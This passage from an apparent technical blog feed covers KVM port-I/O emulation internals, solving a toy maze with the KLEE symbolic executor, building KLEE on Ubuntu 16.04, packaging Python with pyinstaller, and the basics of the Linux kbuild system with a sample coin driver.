if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_OUT)
printf("out port: %d, data: 0x%x\n",
kvm->vcpus->kvm_run->io.port,
*(int *)((char *)(kvm->vcpus->kvm_run) + kvm->vcpus->kvm_run->io.data_offset)
);
else if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_IN)
{
printf("in port: %d\n",kvm->vcpus->kvm_run->io.port);
*(short*)((char*)(kvm->vcpus->kvm_run)+kvm->vcpus->kvm_run->io.data_offset) = 0xbeff;
}
</code></pre></div></div>
<p>Userspace normally drives the ioctl from a loop (otherwise the guest could not keep running), so it calls the KVM_RUN ioctl again. Before re-entering non-root mode, the kernel checks whether vcpu->arch.complete_userspace_io is set and, if so, invokes it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_arch_vcpu_ioctl_run(struct kvm_vcpu *vcpu, struct kvm_run *kvm_run)
{
int r;
sigset_t sigsaved;
if (unlikely(vcpu->arch.complete_userspace_io)) {
int (*cui)(struct kvm_vcpu *) = vcpu->arch.complete_userspace_io;
vcpu->arch.complete_userspace_io = NULL;
r = cui(vcpu);
if (r <= 0)
goto out;
} else
WARN_ON(vcpu->arch.pio.count || vcpu->mmio_needed);
r = __vcpu_run(vcpu);
return r;
}
</code></pre></div></div>
<p>From the earlier analysis we know that</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vcpu->arch.complete_userspace_io = complete_emulated_pio;
</code></pre></div></div>
<p>The corresponding code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int complete_emulated_pio(struct kvm_vcpu *vcpu)
{
BUG_ON(!vcpu->arch.pio.count);
return complete_emulated_io(vcpu);
}
static inline int complete_emulated_io(struct kvm_vcpu *vcpu)
{
int r;
vcpu->srcu_idx = srcu_read_lock(&vcpu->kvm->srcu);
r = emulate_instruction(vcpu, EMULTYPE_NO_DECODE);
srcu_read_unlock(&vcpu->kvm->srcu, vcpu->srcu_idx);
if (r != EMULATE_DONE)
return 0;
return 1;
}
static inline int emulate_instruction(struct kvm_vcpu *vcpu,
int emulation_type)
{
return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
}
</code></pre></div></div>
<p>This ends up calling x86_emulate_instruction again, but note the EMULTYPE_NO_DECODE flag: the instruction is not decoded a second time; instead our earlier em_in callback is executed directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port, void *val,
unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
int ret;
if (vcpu->arch.pio.count)
goto data_avail;
ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
if (ret) {
data_avail:
memcpy(val, vcpu->arch.pio_data, size * count);
vcpu->arch.pio.count = 0;
return 1;
}
return 0;
}
</code></pre></div></div>
<p>This time, in emulator_pio_in_emulated, vcpu->arch.pio.count is already non-zero, meaning the data is available, so it is copied into ctxt->dst.val.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
em_in (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:3440
3440 return X86EMUL_CONTINUE;
(gdb) n
3441 }
(gdb) p ctxt->dst.val
$58 = 48895
(gdb) p /x ctxt->dst.val
$59 = 0xbeff
(gdb) n
</code></pre></div></div>
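<p>The two-call behaviour of emulator_pio_in_emulated can be condensed into a standalone C sketch (toy stand-ins, not the real kernel structures): the first call finds no buffered data and returns 0 to force the exit to userspace; the second call finds the data that userspace deposited and copies it out.</p>

```c
#include <assert.h>
#include <string.h>

/* Toy stand-in for vcpu->arch.pio state (not the real kernel types). */
struct vcpu_model {
    unsigned pio_count;         /* non-zero once an exit is pending    */
    unsigned char pio_data[4];  /* filled by "userspace" between calls */
};

/* Model of emulator_pio_in_emulated():
 * - first call: no data yet, arm the userspace exit, return 0;
 * - second call: data available (the data_avail path), copy it out,
 *   clear the state, and return 1. */
static int pio_in_emulated(struct vcpu_model *v, int size, void *val)
{
    if (v->pio_count == 0) {
        v->pio_count = 1;       /* kvm_run would be set up here */
        return 0;
    }
    memcpy(val, v->pio_data, size);
    v->pio_count = 0;
    return 1;
}
```

<p>Driving the model twice, with a 0xbeff payload deposited in between, reproduces the two-phase flow described above.</p>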
<p>Back in x86_emulate_insn, after the instruction callback has run, control falls through to the writeback function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (ctxt->execute) {
if (ctxt->d & Fastop) {
void (*fop)(struct fastop *) = (void *)ctxt->execute;
rc = fastop(ctxt, fop);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
writeback:
rc = writeback(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
</code></pre></div></div>
<p>Decoding earlier determined that ctxt->dst.type is a register, so write_register_operand is executed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int writeback(struct x86_emulate_ctxt *ctxt)
{
	if (ctxt->d & NoWrite)
		return X86EMUL_CONTINUE;
	switch (ctxt->dst.type) {
	case OP_REG:
		write_register_operand(&ctxt->dst);
		break;
	/* ... other destination types elided ... */
	}
	return X86EMUL_CONTINUE;
}
static void write_register_operand(struct operand *op)
{
/* The 4-byte case *is* correct: in 64-bit mode we zero-extend. */
switch (op->bytes) {
case 1:
*(u8 *)op->addr.reg = (u8)op->val;
break;
case 2:
*(u16 *)op->addr.reg = (u16)op->val;
break;
case 4:
*op->addr.reg = (u32)op->val;
break; /* 64b: zero-extend */
case 8:
*op->addr.reg = op->val;
break;
}
}
</code></pre></div></div>
<p>In this last function, op->addr.reg points at the destination register chosen during decode, which we know is rax (&ctxt->_regs[0]), so the value (0xbeff) is written into that register. This is still the emulation context's copy, though; it must finally be written back into the vcpu's register state (and from there into the guest on the next entry), which happens through the following calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (rc == X86EMUL_CONTINUE)
writeback_registers(ctxt);
static void writeback_registers(struct x86_emulate_ctxt *ctxt)
{
unsigned reg;
for_each_set_bit(reg, (ulong *)&ctxt->regs_dirty, 16)
ctxt->ops->write_gpr(ctxt, reg, ctxt->_regs[reg]);
}
static void emulator_write_gpr(struct x86_emulate_ctxt *ctxt, unsigned reg, ulong val)
{
kvm_register_write(emul_to_vcpu(ctxt), reg, val);
}
static inline void kvm_register_write(struct kvm_vcpu *vcpu,
enum kvm_reg reg,
unsigned long val)
{
vcpu->arch.regs[reg] = val;
__set_bit(reg, (unsigned long *)&vcpu->arch.regs_dirty);
__set_bit(reg, (unsigned long *)&vcpu->arch.regs_avail);
}
</code></pre></div></div>
<p>On the next entry into guest mode, the guest's RAX therefore holds the data passed in from userspace. Below is some debugging output.</p>
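<p>The dirty-register bookkeeping can be modeled in a few lines of standalone C (a sketch with toy types, not the real KVM structures): only registers whose bit is set in regs_dirty are copied from the emulation context back into the vcpu.</p>

```c
#include <assert.h>

#define NR_REGS 16

/* Toy models of the emulation context and the vcpu register file. */
struct emu_ctxt  { unsigned long regs[NR_REGS]; unsigned regs_dirty; };
struct vcpu_regs { unsigned long regs[NR_REGS]; };

/* Model of writeback_registers(): walk the dirty bitmap and copy only
 * the registers the emulator actually modified. */
static void model_writeback_registers(struct vcpu_regs *v, struct emu_ctxt *c)
{
    unsigned reg;

    for (reg = 0; reg < NR_REGS; reg++)
        if (c->regs_dirty & (1u << reg))
            v->regs[reg] = c->regs[reg];
}
```

<p>In the article's example only bit 0 (RAX) is dirty, so only RAX is propagated back.</p>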
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
x86_emulate_insn (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:4828
4828 ctxt->dst.type = saved_dst_type;
(gdb) p ctxt->dst.val
$64 = 48895
(gdb) p &ctxt->dst.val
$65 = (unsigned long *) 0xffff88011d429640
(gdb) p &op->val
No symbol "op" in current context.
(gdb) n
4830 if ((ctxt->d & SrcMask) == SrcSI)
(gdb) p ctxt->dst.type
$66 = OP_REG
(gdb) n
[New Thread 2976]
4833 if ((ctxt->d & DstMask) == DstDI)
(gdb) n
[New Thread 2978]
[New Thread 2977]
4836 if (ctxt->rep_prefix && (ctxt->d & String)) {
(gdb) n
4866 ctxt->eip = ctxt->_eip;
(gdb) n
4875 writeback_registers(ctxt);
</code></pre></div></div>
<h2 id="4">4. References</h2>
<p>oenhan: <a href="http://oenhan.com/kvm-src-5-io-pio">KVM源代码分析5:IO虚拟化之PIO</a></p>
<p>Alex Xu: <a href="http://soulxu.github.io/blog/2014/08/11/use-kvm-api-write-emulator/">使用KVM API实现Emulator
Demo</a></p>
Solving a maze with KLEE (2017-06-09) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/06/09/klee-maze
<p>This is the third KLEE tutorial. It is simple but fun, so it is worth a short note. The original post is <a href="https://feliam.wordpress.com/2010/10/07/the-symbolic-maze/">here</a>.</p>
<h2>Problem description</h2>
<p>The problem is simple: find a path through the maze below from 'X' to '#', where a means left, d right, w up, and s down.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"+-+---+---+"
"|X|     |#|"
"| | --+ | |"
"| |   | | |"
"| +-- | | |"
"|     |   |"
"+-----+---+"
</code></pre></div></div>
<h2>The conventional approach</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/
// twitter.com/feliam
/*
* It's a maze!
* Use a,s,d,w to move "through" it.
*/
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
/**
* Maze hardcoded dimensions
*/
#define H 7
#define W 11
/**
* The maze map
*/
char maze[H][W] = { "+-+---+---+",
                    "| |     |#|",
                    "| | --+ | |",
                    "| |   | | |",
                    "| +-- | | |",
                    "|     |   |",
                    "+-----+---+" };
/**
* Draw the maze state in the screen!
*/
void draw ()
{
int i, j;
for (i = 0; i < H; i++)
{
for (j = 0; j < W; j++)
printf ("%c", maze[i][j]);
printf ("\n");
}
printf ("\n");
}
/**
* The main function
*/
int
main (int argc, char *argv[])
{
int x, y; //Player position
int ox, oy; //Old player position
int i = 0; //Iteration number
#define ITERS 28
char program[ITERS];
//Initial position
x = 1;
y = 1;
maze[y][x]='X';
//Print some info
printf ("Maze dimensions: %dx%d\n", W, H);
printf ("Player pos: %dx%d\n", x, y);
printf ("Iteration no. %d\n",i);
printf ("Program the player moves with a sequence of 'w', 's', 'a' and 'd'\n");
printf ("Try to reach the price(#)!\n");
//Draw the maze
draw ();
//Read the directions 'program' to execute...
read(0,program,ITERS);
//Iterate and run 'program'
while(i < ITERS)
{
//Save old player position
ox = x;
oy = y;
//Move player position depending on the actual command
switch (program[i])
{
case 'w':
y--;
break;
case 's':
y++;
break;
case 'a':
x--;
break;
case 'd':
x++;
break;
default:
printf("Wrong command!(only w,s,a,d accepted!)\n");
printf("You loose!\n");
exit(-1);
}
//If hit the price, You Win!!
if (maze[y][x] == '#')
{
printf ("You win!\n");
printf ("Your solution <%42s>\n",program);
exit (1);
}
//If something is wrong do not advance
if (maze[y][x] != ' '
&&
!((y == 2 && maze[y][x] == '|' && x > 0 && x < W)))
{
x = ox;
y = oy;
}
//Print new maze state and info...
printf ("Player pos: %dx%d\n", x, y);
printf ("Iteration no. %d. Action: %c. %s\n",i,program[i], ((ox==x && oy==y)?"Blocked!":""));
//If crashed to a wall! Exit, you loose
if (ox==x && oy==y){
printf("You loose\n");
exit(-2);
}
//put the player on the maze...
maze[y][x]='X';
//draw it
draw ();
//increment iteration
i++;
//me wait to human
sleep(1);
}
//You couldn't make it! You loose!
printf("You loose\n");
}
</code></pre></div></div>
<p>The program is straightforward: it reads a sequence of moves, checks them one by one, and finally prints a win or loose (sic) message. By inspection you can find one solution, ssssddddwwaawwddddssssddwwww, and of course a backtracking search could find one programmatically. Here we are interested in how KLEE finds solutions.</p>
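<p>For comparison, the backtracking search mentioned above can be written as a short standalone C program (the maze array is copied from the source; the search treats only spaces as walkable, so unlike KLEE it cannot discover the wall-through solutions enabled by the y == 2 special case):</p>

```c
#include <assert.h>
#include <string.h>

#define H 7
#define W 12                 /* 11 visible columns plus the NUL */

/* The maze from the article. */
static char maze[H][W] = {
    "+-+---+---+",
    "| |     |#|",
    "| | --+ | |",
    "| |   | | |",
    "| +-- | | |",
    "|     |   |",
    "+-----+---+"
};

static int visited[H][W];

/* Depth-first backtracking: try w/s/a/d from (x, y), recording the
 * moves in path; returns 1 as soon as the prize '#' is reached. */
static int solve(int x, int y, char *path, int depth)
{
    static const int dx[] = { 0, 0, -1, 1 };
    static const int dy[] = { -1, 1, 0, 0 };
    static const char move[] = "wsad";
    int i;

    if (maze[y][x] == '#') {
        path[depth] = '\0';
        return 1;
    }
    if (maze[y][x] != ' ' || visited[y][x])
        return 0;
    visited[y][x] = 1;

    for (i = 0; i < 4; i++) {
        path[depth] = move[i];
        if (solve(x + dx[i], y + dy[i], path, depth + 1))
            return 1;
    }
    return 0;
}
```

<p>With the move order w, s, a, d this search returns exactly the solution found by eye, ssssddddwwaawwddddssssddwwww.</p>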
<h2>Solving it with KLEE</h2>
<p>KLEE's job is to make the input symbolic, so the first step is to replace the read call with klee_make_symbolic, turning the program variable into a symbolic value. The header klee/klee.h must also be included.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//read(0,program,ITERS);
klee_make_symbolic(program,ITERS,"program");
</code></pre></div></div>
<p>With that, KLEE will enumerate every path, but that alone is not enough: we only care about the winning paths, so we need a flag to mark them. Right after the line</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>printf ("You win!\n");
</code></pre></div></div>
<p>we add</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>klee_assert(0);
</code></pre></div></div>
<p>so that any successful path triggers an assertion. Now run it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ clang -I ../klee/include -emit-llvm -c maze.c
$ klee maze.bc
...
KLEE: done: total instructions = 127519
KLEE: done: completed paths = 309
KLEE: done: generated tests = 306
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000135.assert.err
test@ubuntu:~/kleestudy$ ktest-tool klee-last/test000135.ktest
ktest file : 'klee-last/test000135.ktest'
args : ['maze.bc']
num objects: 1
object 0: name: 'program'
object 0: size: 28
object 0: data: 'sddwddddsddwssssssssssssssss'
</code></pre></div></div>
<p>We get one solution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sddwddddsddwssssssssssssssss
</code></pre></div></div>
<p>Feeding this directly into the program from the previous section confirms it is correct. Note that the solution KLEE prints differs from the one we found by eye. That is expected: by default KLEE emits only one input per error state. To get every input that reaches the error, use -emit-all-errors:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ klee -emit-all-errors maze.bc
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000139.assert.err klee-last/test000238.assert.err
klee-last/test000220.assert.err klee-last/test000301.assert.err
</code></pre></div></div>
<p>Now four solutions are emitted. As you can see while they run (and in the code itself), some of them walk through the wall where y == 2.</p>
Installing KLEE on Ubuntu 16.04 (2017-06-08) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/06/08/klee-newbie
<p>Symbolic execution has a reputation for being rarefied stuff; it is also said to be a deep rabbit hole. This post records how to install KLEE on Ubuntu 16.04 with clang/llvm 3.9. It mostly follows the official instructions, with notes on the spots that are easy to get wrong.</p>
<h3>1. Install the dependencies</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install build-essential curl libcap-dev git cmake libncurses5-dev python-minimal python-pip unzip
</code></pre></div></div>
<h3>2. Install LLVM 3.9</h3>
<p>Install it straight from packages: pick llvm 3.9 from the <a href="http://apt.llvm.org/">LLVM Package Repository</a> and add it to /etc/apt/sources.list:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>deb http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
deb-src http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
</code></pre></div></div>
<p>Add the repository key and install the llvm 3.9 packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget -O - http://llvm.org/apt/llvm-snapshot.gpg.key|sudo apt-key add -
$ sudo apt-get update
$ sudo apt-get install clang-3.9 llvm-3.9 llvm-3.9-dev llvm-3.9-tools
</code></pre></div></div>
<p>Note that only /usr/bin/clang-3.9 is on PATH at this point. To invoke clang and the other tools without the 3.9 suffix, adjust PATH in ~/.profile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export PATH="/usr/lib/llvm-3.9/bin:$PATH"
</code></pre></div></div>
<h3>3. Install a constraint solver</h3>
<p>KLEE supports several constraint solvers; I used <a href="https://github.com/z3prover/z3">Z3</a>, which builds fine following its own instructions.</p>
<h3>4. Build uclibc and the POSIX environment model</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone https://github.com/klee/klee-uclibc.git
$ cd klee-uclibc
$ ./configure --make-llvm-lib
$ make -j2
</code></pre></div></div>
<h3>5. Get Google test sources</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -OL https://github.com/google/googletest/archive/release-1.7.0.zip
$ unzip release-1.7.0.zip
</code></pre></div></div>
<h3>6. Install lit</h3>
<p>Install it with sudo:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo pip install lit
</code></pre></div></div>
<h3>7. Install tcmalloc</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install libtcmalloc-minimal4 libgoogle-perftools-dev
</code></pre></div></div>
<h3>8. Get the KLEE source</h3>
<p>Since we are on llvm 3.9, the official KLEE tree fails to build with errors like:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h: In function ‘bool klee::floats::isNaN(uint64_t, unsigned int)’:
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:135:25: error: ‘IsNAN’ is not a member of ‘llvm’
case FLT_BITS: return llvm::IsNAN( UInt64AsFloat(l) );
^
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:136:25: error: ‘IsNAN’ is not a member of ‘llvm’
case DBL_BITS: return llvm::IsNAN( UInt64AsDouble(l) );
^
/home/test/klee/lib/Core/Executor.cpp: In member function ‘void klee::Executor::executeCall(klee::ExecutionState&, klee::KInstruction*, llvm::Function*, std::vector<klee::ref<klee::Expr> >&)’:
/home/test/klee/lib/Core/Executor.cpp:1403:21: error: ‘RoundUpToAlignment’ is not a member of ‘llvm’
size = llvm::RoundUpToAlignment(size, 16);
</code></pre></div></div>
<p>Fortunately someone provided an llvm 3.9 <a href="https://github.com/klee/klee/pull/605/commits/5c4d9bc67e43e4a97391105dfc6a286215897fdb">pr</a>, so we clone that repo directly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~$ git clone https://github.com/jirislaby/klee.git
test@ubuntu:~$ cd klee
test@ubuntu:~/klee$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/better-paths
remotes/origin/errno
remotes/origin/llvm40_WallTimer
remotes/origin/llvm40_opt_end
remotes/origin/llvm40_static_casts
remotes/origin/llvm_37
remotes/origin/llvm_39
remotes/origin/master
test@ubuntu:~/klee$ git checkout remotes/origin/llvm_39
</code></pre></div></div>
<h3>9. Configure KLEE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir klee_build_dir
$ cd klee_build_dir
$ cmake -DENABLE_SOLVER_Z3=ON \
-DENABLE_POSIX_RUNTIME=ON \
-DENABLE_KLEE_UCLIBC=ON \
-DKLEE_UCLIBC_PATH=../klee-uclibc \
-DGTEST_SRC_DIR=../googletest-release-1.7.0 \
-DENABLE_SYSTEM_TESTS=ON \
-DENABLE_UNIT_TESTS=ON \
../klee
</code></pre></div></div>
<p>If this step complains that Doxygen is missing, install it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install doxygen
</code></pre></div></div>
<p>If it stops at ZLIB_LIBRARY (ADVANCED), download and install zlib yourself.</p>
<h3>10. Build and install KLEE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make
$ sudo make install
</code></pre></div></div>
<p>This step produced one error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make[2]: *** No rule to make target '/usr/lib/llvm-3.9/lib/liblibLLVM-3.9.so.so', needed by 'bin/gen-random-bout'. Stop.
</code></pre></div></div>
<p>The .so cannot be found, and the name liblibLLVM-3.9.so.so looks so odd that it is presumably a build-script bug.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~/klee_build_dir$ cd /usr/lib/llvm-3.9/lib
test@ubuntu:/usr/lib/llvm-3.9/lib$ ls
libLLVM-3.9.1.so libLLVMX86AsmParser.a
libLLVM-3.9.1.so.1 libLLVMX86AsmPrinter.a
libLLVM-3.9.so libLLVMX86CodeGen.a
libLLVM-3.9.so.1 libLLVMX86Desc.a
</code></pre></div></div>
<p>A simple workaround is a symlink (note the command is ln -s; the original post's ln -l is not a valid option):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ln -s libLLVM-3.9.so liblibLLVM-3.9.so.so
</code></pre></div></div>
<p>With that, the KLEE environment is ready and you can start on the tutorials.</p>
Packaging Python into an exe (2017-05-18) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/05/18/python-to-exe
<p>A very short post, recorded here for future reference.</p>
<p>Python is easy to use and often used for scripts, but running them elsewhere may require installing not only the Python interpreter but assorted dependencies as well. This post shows how to bundle a script into an exe with pyinstaller, using the following example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#test.py
import sys
def main():
print "Hello world"
print sys.argv[0]
if '__main__' == __name__:
main()
</code></pre></div></div>
<p>First install pyinstaller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install pyinstaller
</code></pre></div></div>
<p>According to the <a href="http://www.pyinstaller.org/">official site</a>, running this in the Python directory</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pyinstaller test.py
</code></pre></div></div>
<p>should produce the exe. It does appear under dist/test, but moving it elsewhere gives an error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error loading Python DLL: E:\study\python27.dll (error code 126)
</code></pre></div></div>
<p>This can be fixed with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>D:\Python27>pyinstaller --clean --win-private-assemblies -F test.py
</code></pre></div></div>
<p>Now dist contains an exe with Python and all required packages bundled in, which runs in any environment.</p>
A brief introduction to kbuild, the Linux kernel build system (2017-03-29) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/03/29/kbuild-introduction
<ul>
<li><a href="#第一节">Preface</a></li>
<li><a href="#第二节">The four parts of kbuild</a></li>
<li><a href="#第三节">An example</a></li>
</ul>
<h2 id="第一节"> Preface </h2>
<p>This article is not original: it is a summary of a linuxjournal <a href="http://www.linuxjournal.com/content/kbuild-linux-kernel-build-system?page=0,0">article</a> I stumbled on, which is clear and well illustrated, so this is essentially a reading note. It is only a brief introduction to kbuild; the actual kernel build process deserves its own post.</p>
<p>One magical thing about the Linux kernel is that it runs both on huge clusters and on tiny embedded devices, all from a single common code base; Apple, by contrast, keeps OSX and iOS separate. Two things make this possible: Linux has a very good abstraction layer, and its build system allows enormous freedom of customization.</p>
<p>Linux is a monolithic kernel: all kernel code lives in kernel space. But Linux can also load kernel modules, adding code while the kernel is running. So at build time you must decide what is compiled into the kernel and what becomes a module. That calls for a system to manage it all, and that system is kbuild.</p>
<h2 id="第二节"> The four parts of kbuild </h2>
<p>kbuild consists of four main parts:</p>
<ul>
<li><b>Config symbols</b>: compile-time options that control conditional compilation and decide what is built into the kernel and what becomes a module.</li>
<li><b>Kconfig files</b>: define the attributes of each config symbol, such as its type, description, and dependencies. Tools build a menu from the Kconfig files; the data shown by make menuconfig comes from them.</li>
<li><b>.config file</b>: stores the chosen value of every config symbol. It can be edited by hand or generated with make tools.</li>
<li><b>Makefiles</b>: ordinary make machinery describing how sources become objects, the kernel, and kernel modules.</li>
</ul>
<p>Each part is described in detail below.</p>
<h3><b> Configuration Symbols </b></h3>
<p>Configuration symbols decide which features or modules get built into the kernel. The two most common kinds are boolean and tristate; they differ only in the values they can take. A boolean symbol takes two values: true/false, a simple switch. A tristate symbol takes three: yes/no/module.</p>
<p>Many kernel options need a plain switch rather than a module: SMP or preemption support, say, must be fixed at kernel build time, and a boolean config symbol is enough there. Many device drivers can be added to the kernel later; a tristate config symbol decides whether the driver is built in, built as a module, or not built at all.</p>
<p>Other symbol types include strings and hex, but they are rarely used and skipped here.</p>
<h3><b> Kconfig Files </b></h3>
<p>Configuration symbols are defined in Kconfig files. Each Kconfig file may describe any number of symbols and may include other Kconfig files. Kernel build tools such as make menuconfig read them and produce a tree. Every directory in the kernel has a Kconfig that includes the Kconfigs of its subdirectories, and there is one Kconfig at the root of the tree; menuconfig/gconfig start there and read recursively.</p>
<p>Here is an excerpt from the arch/x86 Kconfig:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Select 32 or 64 bit
config 64BIT
bool "64-bit kernel" if ARCH = "x86"
default ARCH != "i386"
---help---
Say yes to build a 64-bit kernel - formerly known as x86_64
Say no to build a 32-bit kernel - formerly known as i386
config X86_32
def_bool y
depends on !64BIT
# Options that are inherently 32-bit kernel only:
select ARCH_WANT_IPC_PARSE_VERSION
select CLKSRC_I8253
select CLONE_BACKWARDS
select HAVE_AOUT
select HAVE_GENERIC_DMA_COHERENT
select MODULES_USE_ELF_REL
select OLD_SIGACTION
</code></pre></div></div>
<h3><b> .config file </b></h3>
<p>All config symbol values are stored in the .config file; every run of menuconfig writes the changes back to it. .config is a plain text file, so it can also be edited by hand. Each line gives the value of one config symbol; unselected symbols appear commented out.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONFIG_KVM_AMD=m
# CONFIG_KVM_MMU_AUDIT is not set
CONFIG_KVM_DEVICE_ASSIGNMENT=y
CONFIG_VHOST_NET=m
</code></pre></div></div>
<h3><b> Makefiles </b></h3>
<p>Makefiles build the kernel and the modules. As with Kconfig, every subdirectory has a Makefile that builds the files under it. The whole build is recursive: the upper Makefile descends into the subdirectories and builds them.</p>
<h2 id="第三节"> An example </h2>
<p>This section puts the above into practice with a coin driver: a char driver that returns a random head or tail on each read, with an optional hit counter.</p>
<p>For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~$ sudo cat /dev/coin
tail
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /sys/kernel/debug/coin/stats
head=14 tail=12
test@ubuntu:~$
</code></pre></div></div>
<p>Adding a module to the kernel takes three steps:</p>
<ol>
<li>Put the sources in the right directory; a wifi device driver, say, belongs in drivers/net/wireless</li>
<li>Update the Kconfig of that directory</li>
<li>Update the Makefile of that directory</li>
</ol>
<p>In our example coin is a character device, so coin.c goes in drivers/char.</p>
<p>coin can be built into the kernel or as a module, so the COIN config symbol should be a tristate (y/n/m). The COIN_STAT symbol decides whether statistics are shown; obviously COIN_STAT depends on COIN, since defining COIN_STAT without COIN is meaningless.</p>
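<p>The corresponding Kconfig entries would go into drivers/char/Kconfig; the following is a sketch based on the description above, with illustrative prompt and help text:</p>

```kconfig
config COIN
	tristate "Coin char device driver"
	help
	  A char device that returns head or tail on each read.

config COIN_STAT
	bool "Coin statistics in debugfs"
	depends on COIN
	help
	  Expose head/tail counters under /sys/kernel/debug/coin/stats.
```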
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$make menuconfig
</code></pre></div></div>
<p>We set COIN to m and COIN_STAT to y. In .config they appear with a CONFIG_ prefix:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONFIG_COIN=m
CONFIG_COIN_STAT=y
</code></pre></div></div>
<p>At build time a script reads the Kconfig:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ scripts/kconfig/conf Kconfig
</code></pre></div></div>
<p>and generates the header include/generated/autoconf.h, where we can see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define CONFIG_COIN_MODULE 1
#define CONFIG_COIN_STAT 1
</code></pre></div></div>
<p>If COIN had been set to y, it would instead contain:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define CONFIG_COIN 1
</code></pre></div></div>
<p>To get the .ko built we also add this to drivers/char/Makefile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-$(CONFIG_COIN) += coin.o
</code></pre></div></div>
